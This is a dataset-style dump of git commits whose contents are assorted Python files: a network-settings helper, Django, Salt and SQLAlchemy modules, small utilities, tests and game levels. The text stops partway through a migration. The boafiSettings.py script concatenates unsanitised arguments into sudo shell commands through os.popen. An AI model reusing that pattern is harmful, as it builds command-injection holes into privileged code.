commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
7a64fb0c3093fd23eeed84799c1590a72f59a96c | Create boafiSettings.py | webGUI/boafiSettings.py | webGUI/boafiSettings.py | #!/usr/bin/python
import os,time,argparse
parser = argparse.ArgumentParser()
parser.add_argument('-intf', action='store', dest='intf',default="none",
help='Select interface')
parser.add_argument('-ip', action='store', dest='ip',default="none",
help='Use given ip address')
parser.add_argument('-reboot', action='store', dest='reboot',default=False,
help='Reboot the machine')
parser.add_argument('-down', action='store', dest='down',default="none",
help='Shut given interface')
parser.add_argument('-up', action='store', dest='up',default="none",
help='Turn on given interface')
parser.add_argument('-restart', action='store', dest='restart',default="none",
help='Restart given service')
parser.add_argument('-ifstat', action='store', dest='ifstat',default="none",
help='Return bandwith values of given seconds')
results = parser.parse_args()
ip=results.ip
intf=results.intf
reboot=results.reboot
down=results.down
up=results.up
restart=results.restart
ifstat=results.ifstat
if not(intf=="none"):
if(ip!="none"):
os.popen("sudo ifconfig "+intf+" "+ip)
else:
print "no ip!"
if(reboot):
os.popen("sudo reboot")
if not(up=="none"):
os.popen("sudo ifconfig "+up+" up")
print "Up interface"+up
if not(down=="none"):
os.popen("sudo ifconfig "+down+" down")
print "Up interface"+down
if not(restart=="none"):
os.popen("sudo service "+restart+" restart")
print "Restarted "+restart
if not(ifstat=="none"):
secs=ifstat
stats=os.popen("timeout "+secs+"s ifstat -t -q 0.5").read()
print stats
| Python | 0.000001 | |
fdd2a50445d2f2cb92480f8f42c463b312411361 | Add a simple command to print all areas in all generations | mapit/management/commands/mapit_print_areas.py | mapit/management/commands/mapit_print_areas.py | # For each generation, show every area, grouped by type
from django.core.management.base import NoArgsCommand
from mapit.models import Area, Generation, Type, NameType, Country, CodeType
class Command(NoArgsCommand):
help = 'Show all areas by generation and area type'
def handle_noargs(self, **options):
for g in Generation.objects.all().order_by('id'):
print g
for t in Type.objects.all().order_by('code'):
qs = Area.objects.filter(type=t,
generation_high__gte=g,
generation_low__lte=g)
print " %s (number of areas: %d)" % (t, qs.count())
for a in qs:
print " ", a
| Python | 0.000003 | |
9dee7d8d253847758d3252401c01215f972a22b1 | Add synthtool scripts (#3765) | google-cloud-monitoring/synth.py | google-cloud-monitoring/synth.py | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This script is used to synthesize generated parts of this library."""
import synthtool as s
import synthtool.gcp as gcp
gapic = gcp.GAPICGenerator()
common_templates = gcp.CommonTemplates()
library = gapic.java_library(
service='monitoring',
version='v3',
config_path='/google/monitoring/artman_monitoring.yaml',
artman_output_name='')
s.copy(library / 'gapic-google-cloud-monitoring-v3/src', 'src')
s.copy(library / 'grpc-google-cloud-monitoring-v3/src', '../../google-api-grpc/grpc-google-cloud-monitoring-v3/src')
s.copy(library / 'proto-google-cloud-monitoring-v3/src', '../../google-api-grpc/proto-google-cloud-monitoring-v3/src')
| Python | 0.000001 | |
92ccb08f72828ba6454bbc3ff162ec73534ceea2 | Interview question: find exact sum of two numbers | python/interviewquestions/find_exact_sum.py | python/interviewquestions/find_exact_sum.py | """
You've built an in-flight entertainment system with on-demand movie streaming.
Users on longer flights like to start a second movie right when their first one
ends, but they complain that the plane usually lands before they can see the
ending. So you're building a feature for choosing two movies whose total
runtimes will equal the exact flight length.
Write a function that takes an integer flight_length (in minutes) and a list
of integers movie_lengths (in minutes) and returns a boolean indicating
whether there are two numbers in movie_lengths whose sum equals flight_length.
When building your function:
Assume your users will watch exactly two movies
Don't make your users watch the same movie twice
Optimize for runtime over memory
"""
"""
We can reword this problem as finding the two numbers in the given list whose
sum is exactly flight_length.
"""
import unittest
def has_valid_movies_combo(l, flight_length):
# we want to know if there are two items a, b in l such as:
# a + b = flight_length
# Given that:
# b = flight_length - a
# We prebuild a new list of (flight_length - a) items so all we have to do
# is iterate again over the list and test that it contains b.
# (We need a dict that also stores the idx of the item so that we can make
# sure that the user won't see the same movie twice. Currently we assume
# that the length of the movies is unique, as not assuming that would
# introduce unnecessary complications (the dict must be a dict of lists)).
sub = dict([(flight_length - item, idx) for idx, item in enumerate(l)])
for idx, item in enumerate(l):
if item in sub and sub[item] != idx:
return True
return False
class TestZeroSum(unittest.TestCase):
def test_true(self):
l = [30, 40, 50, 60, 70]
self.assertTrue(has_valid_movies_combo(l, 80))
self.assertTrue(has_valid_movies_combo(l, 100))
self.assertTrue(has_valid_movies_combo(l, 130))
self.assertTrue(has_valid_movies_combo(l, 90))
def test_false(self):
l = [30, 40, 50, 60, 70]
self.assertFalse(has_valid_movies_combo(l, 10))
self.assertFalse(has_valid_movies_combo(l, 30))
self.assertFalse(has_valid_movies_combo(l, 40))
self.assertFalse(has_valid_movies_combo(l, 14))
def test_same_movie(self):
l = [30, 40]
self.assertFalse(has_valid_movies_combo(l, 60))
if __name__ == "__main__":
unittest.main()
| Python | 0.99999 | |
92f799d0584b598f368df44201446531dffd7d13 | Copy paste artist from filename1 to filename2 | python/utilities/transform_mp3_filenames.py | python/utilities/transform_mp3_filenames.py | # Extract the artist name from songs with filenames in this format:
# (number) - (artist) - (title).mp3
# and add the artists name to songs with filenames in this format:
# (number)..(title).mp3
# to make filenames in this format:
# (number)..(artist)..(title).mp3
#
# eg.: 14 - 13th Floor Elevators - You're Gonna Miss Me.mp3
# + 14..You're Gonna Miss Me.mp3
# => 14..13th Floor Elevators..You're Gonna Miss Me.mp3
#
# Copyright 2017 Dave Cuthbert
# MIT License
from __future__ import print_function #Not needed with python3
import os as os
import re as re
TARGET_DIR = r"/insert/target/path"
def extract_artist(title):
artist_regex = re.compile(' - (.*?) - ')
artist = artist_regex.search(title)
return artist.group(1)
def get_song_list():
song_list = os.listdir(os.getcwd())
return song_list
def get_artists():
song_list = get_song_list()
artists = []
for song in song_list:
artists.append(extract_artist(song))
return artists
def insert_artist_name():
artist_names = get_artists()
old_filenames = os.listdir(TARGET_DIR)
new_filenames = []
for (old_filename, artist) in zip(old_filenames, artist_names):
new_filename = re.sub('\.\.', '..' + artist + '..', old_filename)
os.rename(os.path.join(TARGET_DIR, old_filename),
os.path.join(TARGET_DIR, new_filename))
if "__main__" == __name__:
#print(*get_artists(), sep='\n') #DEBUG
insert_artist_name() | Python | 0 | |
ec0ee6ffc7b72ba50846bac60ec63e1188bf0481 | test parser | parser.py | parser.py | #!/usr/bin/python3
import requests
import sys
from bs4 import BeautifulSoup
#filters through text from soup and strips text of whitespace
def filterText(text):
if text.parent.name in ['style', 'script', '[document]', 'head', 'title']:
return False
if text in ['\n', ' ', '\r', '\t']:
return False
return True
#prints out url with all text from url on one line
def textParser(url):
print (url, end='')
webPage = requests.get(url)
#format html and only print text from webpage:
soup = BeautifulSoup(webPage.content, "lxml")
allText = soup.findAll(text=True)
#print (allText[432])
for i in allText:
if filterText(i):
print (i.replace('\n',' '), end='')
def main():
defaultURLS = "http://en.wikipedia.org/wiki/Web_crawler"
textParser(defaultURLS)
if __name__ == "__main__":
main()
| Python | 0.000028 | |
c6afa2826d6b1ad425919c0b4bc64101d2d4a2d1 | add first file | deepthought_web.py | deepthought_web.py | import random
import string
import pickle
import cherrypy
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
cherrypy.server.socket_host = '0.0.0.0'
cherrypy.config.update({'server.socket_port': 7071})
class DeepThought(object):
def __init__(self):
self.all_identifiers = pickle.load(open('all_identifiers.pkl'))
self.X_tfidf = load_sparse_csr('x_tfidf.csr.npz')
self.meta = pickle.load(open('meta.pkl'))
self.tfidf_vect = pickle.load(open('tfidf_vect.pkl'))
@cherrypy.expose
def index(self):
return """<html>
<head></head>
<body>
<form method="get" action="arxiv_search">
<input type="text" value="1207.4481" name="identifier" />
<button type="submit">Similar Papers</button>
</form>
<form method="get" action="text_search">
<input type="text" value="my astronomy paper" name="text" />
<button type="submit">Similar Papers</button>
</form>
</body>
</html>"""
def _generate_table(self, ranked_similarity, ranked_identifiers):
if np.sum(ranked_similarity) < 1e-10: return "No matches found"
print ranked_similarity, ranked_identifiers
j = 0
table_similarity = []
table_identifier = []
table_title = []
table_link = []
for simil, identifier in zip(ranked_similarity, ranked_identifiers):
table_similarity.append(simil)
table_identifier.append(identifier)
if identifier in self.meta:
table_title.append(self.meta[identifier]['title'])
else:
table_title.append('Title N/A')
if '.' in identifier:
table_link.append('https://arxiv.org/abs/{0}'.format(identifier))
else:
table_link.append('https://arxiv.org/abs/astro-ph/{0}'.format(identifier[8:]))
j+=1
print 'at', j
if j > 50:
break
data_table = pd.DataFrame(zip(table_identifier, table_title, table_link, table_similarity),
columns = ['identifier', 'title', 'link', 'similarity'])
return data_table.to_html()
def _get_similar_documents(self, test_document):
similarity = np.squeeze((self.X_tfidf * test_document.T).A)
similarity_argsort = np.argsort(similarity)[::-1]
ranked_similarity = similarity[similarity_argsort]
ranked_identifiers = np.array(self.all_identifiers)[similarity_argsort]
return ranked_similarity, ranked_identifiers
@cherrypy.expose
def arxiv_search(self, identifier='1207.4481'):
if identifier not in self.all_identifiers:
return "unknown identifier {0}".format(identifier)
else:
test_document_id = self.all_identifiers.index(identifier)
test_document = self.X_tfidf[test_document_id]
ranked_similarity, ranked_identifiers = self._get_similar_documents(test_document)
return self._generate_table(ranked_similarity, ranked_identifiers)
#return ''.join(random.sample(string.hexdigits, int(length)))
@cherrypy.expose
def text_search(self, text='astronomy galaxy star'):
test_document = self.tfidf_vect.transform([text])
ranked_similarity, ranked_identifiers = self._get_similar_documents(test_document)
return self._generate_table(ranked_similarity, ranked_identifiers)
def save_sparse_csr(filename, array):
np.savez(filename,data = array.data ,indices=array.indices,
indptr =array.indptr, shape=array.shape )
def load_sparse_csr(filename):
loader = np.load(filename)
return csr_matrix(( loader['data'], loader['indices'], loader['indptr']),
shape = loader['shape'])
if __name__ == '__main__':
print 'loading...'
dt = DeepThought()
print "loading done"
cherrypy.quickstart(dt)
| Python | 0.000001 | |
58e0ea4b555cf89ace4f5d97c579dbba905e7eeb | Add script to list objects | jsk_arc2017_common/scripts/list_objects.py | jsk_arc2017_common/scripts/list_objects.py | #!/usr/bin/env python
import os.path as osp
import rospkg
PKG_PATH = rospkg.RosPack().get_path('jsk_arc2017_common')
object_names = ['__background__']
with open(osp.join(PKG_PATH, 'data/names/objects.txt')) as f:
object_names += [x.strip() for x in f]
object_names.append('__shelf__')
for obj_id, obj in enumerate(object_names):
print('%2d: %s' % (obj_id, obj))
| Python | 0.000001 | |
04feafc2b3a13b394d5b510e9bc48e542d4880c5 | Create pfkill.py | pfkill.py | pfkill.py | """
how to it use:
$ python pfkill <port number>
what doing:
1. read <port number>.pid file
2. send signal to running app
3. delete <port number>.rule
4. delete <port number>.pid
"""
import os
import sys
import signal
# import logging
port = sys.argv[1]
# read <port>.pid
pid = int(open("%s.pid" % port, 'r').read().split('\n')[0])
# print pid
# kill app by pid
# signal.SIGQUIT or signal.SIGKILL
try:
os.kill(pid, signal.SIGQUIT)
except OSError, e:
print e
# logging.INFO("ee")
# delete <port>.rule
os.unlink("%s.rule" % port)
# delete <port>.pid
os.unlink("%s.pid" % port)
# todo: exit
| Python | 0.000001 | |
e988a10ea18b644b9bc319286d75cb2a15079c59 | add case owners endpoint | corehq/apps/reports/v2/endpoints/case_owner.py | corehq/apps/reports/v2/endpoints/case_owner.py | from __future__ import absolute_import
from __future__ import unicode_literals
from corehq.apps.reports.filters.controllers import (
CaseListFilterOptionsController,
)
from corehq.apps.reports.v2.models import BaseOptionsEndpoint
class CaseOwnerEndpoint(BaseOptionsEndpoint):
slug = "case_owner"
@property
def search(self):
return self.data.get('search', '')
@property
def page(self):
return self.data.get('page', 1)
def get_response(self):
options_controller = CaseListFilterOptionsController(
self.request, self.domain, self.search
)
has_more, results = options_controller.get_options(show_more=True)
return {
'results': results,
'pagination': {
'more': has_more,
}
}
| Python | 0 | |
458091fe923038fe8537bf3b9efbff6157a7e57a | add tests for riakcached.clients.ThreadedRiakClient | riakcached/tests/test_threadedriakclient.py | riakcached/tests/test_threadedriakclient.py | import mock
import unittest2
from riakcached.clients import ThreadedRiakClient
import riakcached.pools
class TestThreadedRiakClient(unittest2.TestCase):
def test_get_many(self):
pool = mock.Mock(spec=riakcached.pools.Pool)
pool.request.return_value = 200, "result", {"content-type": "text/plain"}
pool.url = "http://127.0.0.1:8098"
client = ThreadedRiakClient("test_bucket", pool=pool)
results = client.get_many(["test1", "test2"])
self.assertEqual(results, {
"test1": "result",
"test2": "result",
})
self.assertEqual(2, pool.request.call_count)
pool.request.assert_any_call(
method="GET",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
)
pool.request.assert_any_call(
method="GET",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
)
def test_set_many(self):
pool = mock.Mock(spec=riakcached.pools.Pool)
pool.request.return_value = 200, "", {"content-type": "text/plain"}
pool.url = "http://127.0.0.1:8098"
client = ThreadedRiakClient("test_bucket", pool=pool)
client.set_many({
"test1": "value1",
"test2": "value2",
})
self.assertEqual(2, pool.request.call_count)
pool.request.assert_any_call(
method="POST",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
body="value1",
headers={
"Content-Type": "text/plain",
},
)
pool.request.assert_any_call(
method="POST",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
body="value2",
headers={
"Content-Type": "text/plain",
},
)
def test_delete_many(self):
pool = mock.Mock(spec=riakcached.pools.Pool)
pool.request.return_value = 204, "", {}
pool.url = "http://127.0.0.1:8098"
client = ThreadedRiakClient("test_bucket", pool=pool)
client.delete_many(["test1", "test2"])
self.assertEqual(2, pool.request.call_count)
pool.request.assert_any_call(
method="DELETE",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test1",
)
pool.request.assert_any_call(
method="DELETE",
url="http://127.0.0.1:8098/buckets/test_bucket/keys/test2",
)
| Python | 0 | |
1d388bf1a38eaaafa4d79287ce7aabb59f84e649 | Add initial img module | salt/modules/img.py | salt/modules/img.py | '''
Virtual machine image management tools
'''
def mnt_image(location):
'''
Mount the named image and return the mount point
CLI Example::
salt '*' img.mount_image /tmp/foo
'''
if 'guestfs.mount' in __salt__:
return __salt__['guestfs.mount'](location)
elif 'qemu_nbd' in __salt__:
mnt = __salt__['qemu_nbd.init'](location)
__context__['img.mnt_{0}'.location] = mnt
return mnt.keys()[0]
return ''
def umount_image(mnt):
'''
Unmount an image mountpoint
CLI Example::
salt '*' img.umount_image /mnt/foo
'''
if 'qemu_nbd.clear' in __salt__:
if 'img.mnt_{0}'.format(mnt) in __context__:
__salt__['qemu_nbd.clear'](__context__['img.mnt_{0}'.fomat(mnt)])
return
__salt__['mount.umount'](mnt)
def seed(location, id_='', config=None):
'''
Make sure that the image at the given location is mounted, salt is
installed, keys are seeded, and execute a state run
CLI Example::
salt '*' img.seed /tmp/image.qcow2
'''
if config is None:
config = {}
mpt = mnt_image(location)
mpt_tmp = os.path.join(mpt, 'tmp')
__salt__['mount.mount'](
os.path.join(mpt, 'dev'),
'udev',
fstype='devtmpfs')
# Verify that the boostrap script is downloaded
bs_ = __salt__['config.gather_bootstrap_script']()
# Apply the minion config
# Generate the minion's key
salt.crypt.gen_keys(mpt_tmp, 'minion', 2048)
# TODO Send the key to the master for approval
# Execute chroot routine
sh_ = '/bin/sh'
if os.path.isfile(os.path.join(mpt, 'bin/bash')):
sh_ = '/bin/bash'
# Copy script into tmp
shutil.copy(bs_, os.path.join(mpt, 'tmp'))
if not 'master' in config:
config['master'] = __opts__['master']
if id_:
config['id'] = id_
with open(os.path.join(mpt_tmp, 'minion'), 'w+') as fp_:
fp_.write(yaml.dump(config, default_flow_style=False))
# Generate the chroot command
c_cmd = 'sh /tmp/bootstrap.sh'
cmd = 'chroot {0} {1} -c \'{2}\''.format(
mpt,
sh_,
c_cmd)
__salt__['cmd.run'](cmd)
__salt__['mount.umount'](os.path.join(mpt, 'dev'))
umount_image(mpt)
def bootstrap(location, size, fmt):
'''
HIGHLY EXPERIMENTAL
Bootstrap a virtual machine image
location:
The location to create the image
size:
The size of the image to create in megabytes
fmt:
The image format, raw or qcow2
CLI Example::
salt '*' qemu_nbd.bootstrap /srv/salt-images/host.qcow 4096 qcow2
'''
location = __salt__['img.make_image'](location, size, fmt)
if not location:
return ''
nbd = __salt__['qemu_nbd.connect'](location)
__salt__['partition.mklabel'](nbd, 'msdos')
__salt__['partition.mkpart'](nbd, 'primary', 'ext4', 1, -1)
__salt__['partition.probe'](nbd)
__salt__['partition.mkfs']('{0}p1'.format(nbd), 'ext4')
mnt = __salt__['qemu_nbd.mount'](nbd)
#return __salt__['pkg.bootstrap'](nbd, mnt.keys()[0])
| Python | 0 | |
ae5407acd1fb93fe04747a10b7bda2fc1ec91790 | add smf module to support virtual service module on solaris 10+ | salt/modules/smf.py | salt/modules/smf.py | '''
Service support for Solaris 10 and 11, should work with other systems
that use SMF also. (e.g. SmartOS)
'''
def __virtual__():
'''
Only work on systems which default to SMF
'''
# Don't let this work on Solaris 9 since SMF doesn't exist on it.
enable = [
'Solaris',
]
if __grains__['os'] in enable:
if __grains__['os'] == 'Solaris' and __grains__['kernelrelease'] == "5.9":
return False
return 'service'
return False
def get_enabled():
'''
Return the enabled services
CLI Example::
salt '*' service.get_enabled
'''
ret = set()
cmd = 'svcs -H -o SVC,STATE -s SVC'
lines = __salt__['cmd.run'](cmd).split('\n')
for line in lines:
comps = line.split()
if not comps:
continue
if 'online' in line:
ret.add(comps[0])
return sorted(ret)
def get_disabled():
'''
Return the disabled services
CLI Example::
salt '*' service.get_disabled
'''
ret = set()
cmd = 'svcs -aH -o SVC,STATE -s SVC'
lines = __salt__['cmd.run'](cmd).split('\n')
for line in lines:
comps = line.split()
if not comps:
continue
if not 'online' in line and not 'legacy_run' in line:
ret.add(comps[0])
return sorted(ret)
def get_all():
'''
Return all installed services
CLI Example::
salt '*' service.get_all
'''
ret = set()
cmd = 'svcs -aH -o SVC,STATE -s SVC'
lines = __salt__['cmd.run'](cmd).split('\n')
for line in lines:
comps = line.split()
if not comps:
continue
ret.add(comps[0])
return sorted(ret)
def start(name):
'''
Start the specified service
CLI Example::
salt '*' service.start <service name>
'''
cmd = '/usr/sbin/svcadm enable -t {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def stop(name):
'''
Stop the specified service
CLI Example::
salt '*' service.stop <service name>
'''
cmd = '/usr/sbin/svcadm disable -t {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def restart(name):
'''
Restart the named service
CLI Example::
salt '*' service.restart <service name>
'''
cmd = '/usr/sbin/svcadm restart {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def status(name, sig=None):
'''
Return the status for a service, returns a bool whether the service is
running.
CLI Example::
salt '*' service.status <service name>
'''
cmd = '/usr/bin/svcs -H -o STATE {0}'.format(name)
line = __salt__['cmd.run'](cmd).strip()
if line == 'online':
return True
else:
return False
def enable(name):
'''
Enable the named service to start at boot
CLI Example::
salt '*' service.enable <service name>
'''
cmd = '/usr/sbin/svcadm enable {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def disable(name):
'''
Disable the named service to start at boot
CLI Example::
salt '*' service.disable <service name>
'''
cmd = '/usr/sbin/svcadm disable {0}'.format(name)
return not __salt__['cmd.retcode'](cmd)
def enabled(name):
'''
Check to see if the named service is enabled to start on boot
CLI Example::
salt '*' service.enabled <service name>
'''
return name in get_enabled()
def disabled(name):
'''
Check to see if the named service is disabled to start on boot
CLI Example::
salt '*' service.disabled <service name>
'''
return name in get_disabled()
| Python | 0 | |
a91a942c45921b64fe0d740d81604dba921c214e | Create folder for QC and CNV cutoff codes | bin/cutoffs/__init__.py | bin/cutoffs/__init__.py | Python | 0 | ||
e40b92966762dfadff53355e9e38636a4769543f | Add intermediate tower 2 | pythonwarrior/towers/intermediate/level_002.py | pythonwarrior/towers/intermediate/level_002.py | # ----
# |@s |
# | sS>|
# ----
level.description("Another large room, but with several enemies "
"blocking your way to the stairs.")
level.tip("Just like walking, you can attack_ and feel in multiple "
"directions ('forward', 'left', 'right', 'backward').")
level.clue("Call warrior.feel(direction).is_enemy() in each direction "
"to make sure there isn't an enemy beside you "
"(attack if there is). "
"Call warrior.rest_ if you're low and health when there "
"are no enemies around.")
level.time_bonus(40)
level.ace_score(84)
level.size(4, 2)
level.stairs(3, 1)
def add_abilities(warrior):
warrior.add_abilities('attack_')
warrior.add_abilities('health')
warrior.add_abilities('rest_')
level.warrior(0, 0, 'east', func=add_abilities)
level.unit('sludge', 1, 0, 'west')
level.unit('thick_sludge', 2, 1, 'west')
level.unit('sludge', 1, 1, 'north')
| Python | 0.999719 | |
71d66fb3bdbcb38d29accb6bdfbf4ac8b2996e89 | Add intermediate tower 3 | pythonwarrior/towers/intermediate/level_003.py | pythonwarrior/towers/intermediate/level_003.py | # ---
# |>s |
# |s@s|
# | C |
# ---
level.description("You feel slime on all sides, you're surrounded!")
level.tip("Call warrior.bind_(direction) to bind an enemy to keep him "
"from attacking. Bound enemies look like captives.")
level.clue("Count the number of enemies around you. Bind an enemy if "
"there are two or more.")
level.time_bonus(50)
level.ace_score(101)
level.size(3, 3)
level.stairs(0, 0)
def add_abilities(warrior):
warrior.add_abilities('bind_')
warrior.add_abilities('rescue_')
level.warrior(1, 1, 'east', func=add_abilities)
level.unit('sludge', 1, 0, 'west')
level.unit('captive', 1, 2, 'west')
level.unit('sludge', 0, 1, 'west')
level.unit('sludge', 2, 1, 'west')
| Python | 0.999787 | |
260cb76132bfe618b58cf34ad8dd61f59e847f90 | create table | zaifbot/models/nonce.py | zaifbot/models/nonce.py | from sqlalchemy import Column, Integer, String, DateTime
from datetime import datetime
from zaifbot.models import Base
class Nonce(Base):
__tablename__ = 'nonces'
id = Column(Integer, primary_key=True)
key = Column(String, nullable=False)
secret = Column(String, nullable=False)
nonce = Column(Integer, default=0, nullable=False)
created_at = Column(DateTime, default=datetime.now())
updated_at = Column(DateTime, default=datetime.now(), onupdate=datetime.now())
| Python | 0.00008 | |
a72567202e9b4024758706c00f016153ec04a53d | Create render.py | render.py | render.py | #! /usr/bin/python3
from random import random
import pyglet
from pyglet.window import key, Window
from pyglet.gl import *
from pyglet.gl.glu import *
window = Window()
@window.event
def on_draw():
pass # TODO: implement!
@window.event
def on_resize(width, height):
pass # TODO: implement!
@window.event
def on_key_press(symbol, modifiers):
if symbol == key.LEFT:
update_frame(-1)
elif symbol == key.RIGHT:
update_frame(1)
if __name__=="__main__":
pyglet.clock.schedule_interval(update_frame, 0.02)
pyglet.app.run()
| Python | 0.000001 | |
77dca533f2d2fe94b233bd48561e1ed887928265 | add sample.py | sample.py | sample.py | #-*- coding: UTF-8 -*-
# https://github.com/carpedm20/LINE
from line import LineClient, LineGroup, LineContact
f = open("credentials")
ID = f.readline().strip()
PASSWD = f.readline().strip()
f.close()
client = LineClient(ID, PASSWD, com_name="line_api_demo")
friends = client.contacts
for i, friend in enumerate(friends):
print i, friend
#for i, group in enumerate(groups):
# print i, group
friend = client.contacts[429]
friend.sendMessage("hello world! 本訊息由機器人寄送 XD")
| Python | 0.000001 | |
cf3ed974c97d6eaa7983b249a65b4e6df4309c28 | Rename owners to instances | nycodex/db.py | nycodex/db.py | from enum import Enum
import os
import typing
import sqlalchemy
from sqlalchemy.dialects import postgresql
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base() # type: typing.Any
engine = sqlalchemy.create_engine(os.environ["DATABASE_URI"])
Session = sqlalchemy.orm.sessionmaker(bind=engine)
class DomainCategory(Enum):
BIGAPPS = "NYC BigApps"
BUSINESS = "Business"
CITY_GOVERNMENT = "City Government"
EDUCATION = "Education"
ENVIRONMENT = "Environment"
HEALTH = "Health"
HOUSING_DEVELOPMENT = "Housing & Development"
PUBLIC_SAFETY = "Public Safety"
RECREATION = "Recreation"
SOCIAL_SERVICES = "Social Services"
TRANSPORTATION = "Transportation"
class DbMixin():
__table__: sqlalchemy.Table
@classmethod
def upsert(cls, conn: sqlalchemy.engine.base.Connection,
instances: typing.Iterable["DbMixin"]) -> None:
keys = cls.__table__.c.keys()
for instance in instances:
data = {key: getattr(instance, key) for key in keys}
insert = (postgresql.insert(cls.__table__).values(**data)
.on_conflict_do_update(
index_elements=[cls.__table__.c.id],
set_={k: data[k]
for k in data if k != 'id'}))
conn.execute(insert)
def __eq__(self, other):
keys = self.__table__.c.keys()
return ({key: getattr(self, key)
for key in keys} == {
key: getattr(other, key)
for key in keys
})
class Dataset(Base, DbMixin):
__tablename__ = "dataset"
id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.VARCHAR, nullable=False)
description = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
owner_id = sqlalchemy.Column(
sqlalchemy.CHAR(9), sqlalchemy.ForeignKey("owner.id"))
domain_category = sqlalchemy.Column(
postgresql.ENUM(
* [v.value for v in DomainCategory.__members__.values()],
name="DomainCategory"),
nullable=True)
class Owner(Base, DbMixin):
__tablename__ = "owner"
id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
| from enum import Enum
import os
import typing
import sqlalchemy
from sqlalchemy.dialects import postgresql
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
engine = sqlalchemy.create_engine(os.environ["DATABASE_URI"])
Session = sqlalchemy.orm.sessionmaker(bind=engine)
class DomainCategory(Enum):
BIGAPPS = "NYC BigApps"
BUSINESS = "Business"
CITY_GOVERNMENT = "City Government"
EDUCATION = "Education"
ENVIRONMENT = "Environment"
HEALTH = "Health"
HOUSING_DEVELOPMENT = "Housing & Development"
PUBLIC_SAFETY = "Public Safety"
RECREATION = "Recreation"
SOCIAL_SERVICES = "Social Services"
TRANSPORTATION = "Transportation"
class DbMixin():
@classmethod
def upsert(cls, conn: sqlalchemy.engine.base.Connection,
owners: typing.Iterable["Owner"]) -> None:
keys = cls.__table__.c.keys()
for owner in owners:
data = {key: getattr(owner, key) for key in keys}
insert = (postgresql.insert(cls.__table__).values(**data)
.on_conflict_do_update(
index_elements=[cls.__table__.c.id],
set_={k: data[k]
for k in data if k != 'id'}))
conn.execute(insert)
def __eq__(self, other):
keys = self.__table__.c.keys()
return ({key: getattr(self, key)
for key in keys} == {
key: getattr(other, key)
for key in keys
})
class Dataset(Base, DbMixin):
__tablename__ = "dataset"
id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.VARCHAR, nullable=False)
description = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
owner_id = sqlalchemy.Column(
sqlalchemy.CHAR(9), sqlalchemy.ForeignKey("owner.id"))
domain_category = sqlalchemy.Column(
postgresql.ENUM(
* [v.value for v in DomainCategory.__members__.values()],
name="DomainCategory"),
nullable=True)
class Owner(Base, DbMixin):
__tablename__ = "owner"
id = sqlalchemy.Column(sqlalchemy.CHAR(9), primary_key=True)
name = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)
| Python | 0.000082 |
db195957288ef7b6c5c9de6551689d4d06db28c1 | Create add_digits.py | lintcode/naive/add_digits/py/add_digits.py | lintcode/naive/add_digits/py/add_digits.py | class Solution:
# @param {int} num a non-negative integer
# @return {int} one digit
def addDigits(self, num):
while len(str(num)) > 1:
num = sum(map(int, str(num)))
return num
| Python | 0.000094 | |
836845abde53ee55bca93f098ece78880ab6b5c6 | Use same variable names as testing environment | examples/events/create_massive_dummy_events.py | examples/events/create_massive_dummy_events.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import url, key
import argparse
import tools
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create a given number of event containing a given number of attributes eachh.')
parser.add_argument("-l", "--limit", type=int, help="Number of events to create (default 1)")
parser.add_argument("-a", "--attribute", type=int, help="Number of attributes per event (default 3000)")
args = parser.parse_args()
misp = PyMISP(url, key, True, 'json')
if args.limit is None:
args.limit = 1
if args.attribute is None:
args.attribute = 3000
for i in range(args.limit):
tools.create_massive_dummy_events(misp, args.attribute)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
from pymisp import PyMISP
from keys import misp_url, misp_key, misp_verifycert
import argparse
import tools
def init(url, key):
return PyMISP(url, key, misp_verifycert, 'json')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Create a given number of event containing a given number of attributes eachh.')
parser.add_argument("-l", "--limit", type=int, help="Number of events to create (default 1)")
parser.add_argument("-a", "--attribute", type=int, help="Number of attributes per event (default 3000)")
args = parser.parse_args()
misp = init(misp_url, misp_key)
if args.limit is None:
args.limit = 1
if args.attribute is None:
args.attribute = 3000
for i in range(args.limit):
tools.create_massive_dummy_events(misp, args.attribute)
| Python | 0.000016 |
2d12c640e42e83580ee27933f0ad9bed2ebcc169 | add allauth and make owner of audio required | satsound/migrations/0007_auto_20170115_0331.py | satsound/migrations/0007_auto_20170115_0331.py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-01-15 03:31
from __future__ import unicode_literals
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('satsound', '0006_auto_20161230_0403'),
]
operations = [
migrations.AlterField(
model_name='satelliteaudio',
name='user',
